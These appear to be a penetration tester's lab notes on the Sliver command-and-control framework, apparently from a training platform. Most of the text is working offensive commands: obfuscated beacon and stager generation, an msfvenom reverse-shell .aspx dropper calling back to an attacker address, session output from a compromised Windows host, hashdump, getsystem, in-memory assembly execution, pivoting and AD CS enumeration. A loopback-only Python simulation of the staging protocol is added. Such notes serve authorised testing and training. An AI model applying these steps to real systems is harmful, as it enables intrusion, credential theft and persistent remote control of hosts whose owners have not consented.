Intro C2 Sliver

A command and control (C2) server is the attacker-side infrastructure that tasks compromised hosts with commands and collects their output. Sliver is an open-source C2 framework written in Go.

Terms to know.

  • Implants: The binaries/executables run on the target to keep access and to carry the communication channel between attacker and compromised system.
  • Beacons: An implant mode in which the target checks in with the C2 server periodically (interval plus jitter) instead of holding an open connection.
  • Stagers: A small first-stage payload that connects back, downloads the full implant and executes it, so the initial delivery stays small.
  • Armory: Sliver's package manager for aliases and extensions, mostly precompiled .NET tools and BOFs that can be run on the victim machine.

Always start with a beacon: a beacon can be upgraded to an interactive session with the interactive command, but a session cannot be downgraded back to a beacon.

Session

Creating a new operator (user profile)

[server] sliver > new-operator -n mczen -l 10.10.14.76

# Generates a .cfg (operator certificate plus server address) for sliver-client
[*] Generating new client certificate, please wait ...
[*] Saved new client config to: /home/kali/mczen_10.10.14.76.cfg

Enable multiplayer mode to allow multiple operators

[server] sliver > multiplayer

[*] Multiplayer mode enabled!
[*] student has joined the game

Armory

Aliases and extensions (mostly .NET tools and BOFs) that can be installed from the armory and then run from the client.

# List available packages
armory 

# Install a single package
armory install seatbelt

# Install all packages
armory install all

Beacon

# Generate a beacon (--skip-symbols disables symbol obfuscation, faster build; -N is the implant name; --http must point at where the listener will be reachable)
generate beacon --http 127.0.0.1 --skip-symbols -N http_beacon --os windows

# Obfuscated: without --skip-symbols the default symbol obfuscation is applied (slower build)
generate beacon --http 127.0.0.1 -N http_beacon_obfuscated --os windows

# Generate a beacon for linux
generate beacon --http 127.0.0.1 -N http_beacon --os linux

Listeners

# Start an HTTP listener on the default port 80
http 

# Same on port 8088 (must match the port the implant was generated with)
http --lport 8088

Stagers

As payloads can be pretty big (around 10 MB), you may sometimes need a stager to execute your implant on a target system. Sliver supports the meterpreter staging protocol over TCP and HTTP(S). This protocol is pretty straightforward:

Creating a new profile

profiles new --http 10.10.14.120:8888 --format shellcode zen

Create a stage listener

stage-listener --url tcp://10.10.14.120:4443 --profile zen

Start the HTTP listener the staged implant will call back to (same port as the profile's --http)

http -L 10.10.14.120 -l 8888

Generate stager

generate stager --lhost 10.10.14.120 --lport 4443 --format csharp --save staged.txt

Generate an msfvenom .aspx template to carry the stager

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.120 LPORT=4443 -f aspx > sliver.aspx

In the .aspx file, replace the shellcode array (everything from new byte onward) with the C# stager from staged.txt; the stager's architecture must match the profile's, or the stage will crash on load. Upload the .aspx to the web server and request it in a browser: the stager connects to the stage listener on 4443, pulls the implant, and a session comes back on the HTTP listener.
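The staging exchange described above, as an added example that is not part of the original notes and not Sliver's or Metasploit's code: a loopback Python simulation of a tcp:// stage listener and of the stager's side of the meterpreter TCP staging handshake. The framing (a 4-byte little-endian length followed by the stage) is my reading of the meterpreter reverse_tcp staging protocol and is an assumption; the stage bytes are a constructed placeholder and nothing is executed.

```python
import socket
import struct
import threading

# Constructed stand-in for the stage. In a real run this is the implant
# shellcode built from the "zen" profile; here it is just a marker blob.
FAKE_STAGE = b"\x90" * 16 + b"SLIVER-STAGE-PLACEHOLDER"


def serve_stage(stage: bytes, host: str = "127.0.0.1", port: int = 0):
    """Mimic a tcp:// stage listener: accept one client, send the stage
    length as a 4-byte little-endian integer, then the stage itself.
    Returns the (host, port) actually bound (port 0 = pick a free one)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)

    def handle():
        conn, _ = srv.accept()
        with conn:
            # No authentication: whoever connects gets the stage. Keep stage
            # listeners up only for the window in which you need them.
            conn.sendall(struct.pack("<I", len(stage)) + stage)
        srv.close()

    threading.Thread(target=handle, daemon=True).start()
    return srv.getsockname()


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    """recv() may return short reads; loop until n bytes or EOF."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(min(65536, n - len(buf)))
        if not chunk:
            raise ConnectionError(f"peer closed after {len(buf)} of {n} bytes")
        buf.extend(chunk)
    return bytes(buf)


def fetch_stage(host: str, port: int, max_size: int = 64 * 1024 * 1024) -> bytes:
    """What the stager does: connect, read the 4-byte length, then read
    exactly that many bytes. A real stager would allocate RWX memory and
    jump into the buffer; here the bytes are simply returned."""
    with socket.create_connection((host, port), timeout=5) as s:
        (size,) = struct.unpack("<I", _recv_exact(s, 4))
        if size == 0 or size > max_size:
            raise ValueError(f"implausible stage size {size}")
        return _recv_exact(s, size)


def roundtrip(stage: bytes = FAKE_STAGE) -> bytes:
    """Serve a stage on a free loopback port and fetch it like a stager would."""
    host, port = serve_stage(stage)
    return fetch_stage(host, port)


if __name__ == "__main__":
    got = roundtrip()
    print(f"received {len(got)} byte stage, matches: {got == FAKE_STAGE}")
```

The listener side answers any client that connects, which is why the stage listener should only be exposed while the .aspx is being triggered. The sanity check on the advertised size is something a real stager does not do; it is there to show where a hostile listener could make a stager allocate arbitrary memory.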

Once sessions come back, select one with use followed by its ID

# Show sessions
[server] sliver > sessions

 ID         Name            Transport   Remote Address         Hostname   Username   Operating System   Locale   Last Message                                  Health  
========== =============== =========== ====================== ========== ========== ================== ======== ============================================= =========
 0fb55977   STANDARD_GOWN   http(s)     10.129.135.124:49702   web01      <err>      windows/amd64      en-US    Tue Jan 21 12:35:56 EST 2025 (2s ago)         [ALIVE] 
 520436a4   STANDARD_GOWN   http(s)     10.129.135.124:49696   web01      <err>      windows/amd64      en-US    Tue Jan 21 12:35:56 EST 2025 (2s ago)         [ALIVE] 

# Use session
[server] sliver > use 0fb55977
[*] Active session STANDARD_GOWN (0fb55977-1d1a-49b6-a38c-3050062a3f2b)

# Get info 
[server] sliver (STANDARD_GOWN) > info

        Session ID: 0fb55977-1d1a-49b6-a38c-3050062a3f2b
              Name: STANDARD_GOWN
          Hostname: web01
              UUID: 8e791442-8f32-0734-2206-371cf25d6bb6
          Username: <err>
               UID: <err>
               GID: <err>
               PID: 2668
                OS: windows
           Version: Server 2016 build 17763 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: https://10.10.14.120:8888
    Remote Address: 10.129.135.124:49702
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Tue Jan 21 12:34:21 EST 2025 (2m8s ago)
      Last Checkin: Tue Jan 21 12:36:27 EST 2025 (2s ago)

SharPyShell can generate an obfuscated ASP.NET web shell to upload instead.

Port Forward and Pivot

# Port forwarding: expose 192.168.1.5:445 (reachable from the implant) on the operator's 127.0.0.1:8445
sliver > portfwd add --remote 192.168.1.5:445 --local 127.0.0.1:8445

# Pivot: start a SOCKS5 proxy tunneled through the implant; point proxychains or a browser at 127.0.0.1:1080
[server] sliver (zen_shell) > socks5 start -P 1080

[*] Started SOCKS5 127.0.0.1 1080
⚠️  In-band SOCKS proxies can be a little unstable depending on protocol

Command - execute-assembly

In an interactive session you can use:

  • ls
  • cat
  • cd
  • upload
  • download
  • hashdump
  • getprivs
  • getsystem

Most importantly, execute-assembly runs a .NET assembly from the operator machine in memory on the target: it is sent over the C2 channel into a sacrificial process and never written to the target's disk.

# Run a local Seatbelt.exe on the target without dropping it to disk
execute-assembly Seatbelt.exe -group=system

# Same via the armory alias installed earlier
seatbelt -- -group=system

Domain Recon

Either host PowerView on your HTTP server and load it on the target, or use the armory BOFs (the c2tc-* packages come from Outflank's C2-Tool-Collection):

c2tc-domaininfo 

ADCS Certify

# Certify (armory alias): enumerate AD CS templates
certify -- find 

# Run certutil.exe on the target and capture its output (-o)
execute -o certutil.exe

Network

# List the implant host's network interfaces
ifconfig